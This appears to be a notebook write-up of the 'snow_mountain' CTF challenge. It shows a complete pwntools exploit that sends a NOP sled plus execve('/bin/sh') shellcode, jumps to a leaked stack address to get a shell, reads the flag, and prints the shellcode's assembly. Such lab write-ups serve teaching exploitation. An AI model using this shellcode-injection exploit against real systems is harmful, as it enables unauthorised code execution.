# NOP sled

## Example: snow_mountaint

Source: MetasequoiaCTF


In [1]:
bin_filename = './snow_mountain'
from pwn import *
from pwnlib import gdb, shellcraft

context.terminal = ['tmux', 'new-window']
context.arch = 'amd64'
elf = ELF(bin_filename)
# print(elf.checksec())

[*] '/ctf/work/nop-sled/snow_mountain'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments


Reverse the binary, we get:

```c
char *stack_rand; // rax
void (*func)(void); // [rsp+8h] [rbp-1008h] BYREF
char buf[0x1000]; // [rsp+10h] [rbp-1000h] BYREF

setbuf(stdout, 0LL);
srand((unsigned int)buf);
sleep_3sec();
stack_rand = get_stack_rand();                // rsp +/- 0x300
printf("...Current position: %p\n\n", stack_rand);
printf("What's your plan, hero?\n> ");
fgets(buf, 0x1000, stdin);
printf("Where are you going to land?\n> ");
__isoc99_scanf("%p", &func);
func();
```

The key problem is we don't kwow the exact value of rsp. We can use "nop sled" technique to 

```
---(higher address)--->
       +----buf (rsp+0x10) 
       V
.......bbbbbbbbbbbb
|            |
+--rsp_rand--+
```

In [2]:
def get_rsp_rand(io: tube):
    io.recvuntil(b'Current position: ')
    v = io.recvline()
    return int(v.decode(), 16)

def exploit(io: tube):
    rsp_rand = get_rsp_rand(io)
    io.recvuntil(b'> ')
    # https://docs.pwntools.com/en/stable/shellcraft/aarch64.html
    payload  = asm(shellcraft.nop()) * 0x600
    payload += asm(shellcraft.amd64.linux.sh())
    
    # no newlines
    assert all(b != 10 for b in payload)
    
    io.sendline(payload)
    print(f'{rsp_rand=:x}')
    io.sendline(f'{rsp_rand + 0x300:x}'.encode())


In [3]:
io = process(bin_filename)
try:
    exploit(io)
    io.recvuntil(b'> ')
    with context.local(log_level='debug'):
        io.sendline(b'cat ../flag')
        io.sendline(b'exit')
        print(io.recvall())
    io.poll(block=True)
except Exception as e:
    io.kill()
    raise e

[x] Starting local process './snow_mountain'
[+] Starting local process './snow_mountain': pid 1901
rsp_rand=7ffe8fedf520
[DEBUG] Sent 0xc bytes:
    b'cat ../flag\n'
[DEBUG] Sent 0x5 bytes:
    b'exit\n'
[x] Receiving all data
[x] Receiving all data: 0B
[*] Process './snow_mountain' stopped with exit code 0 (pid 1901)
[DEBUG] Received 0x11 bytes:
    b'flag{hello world}'
[x] Receiving all data: 17B
[+] Receiving all data: Done (17B)
b'flag{hello world}'


In [4]:
print(shellcraft.amd64.linux.sh())

    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    mov rax, 0x732f2f2f6e69622f
    push rax
    mov rdi, rsp
    /* push argument array ['sh\x00'] */
    /* push b'sh\x00' */
    push 0x1010101 ^ 0x6873
    xor dword ptr [rsp], 0x1010101
    xor esi, esi /* 0 */
    push rsi /* null terminate */
    push 8
    pop rsi
    add rsi, rsp
    push rsi /* 'sh\x00' */
    mov rsi, rsp
    xor edx, edx /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall

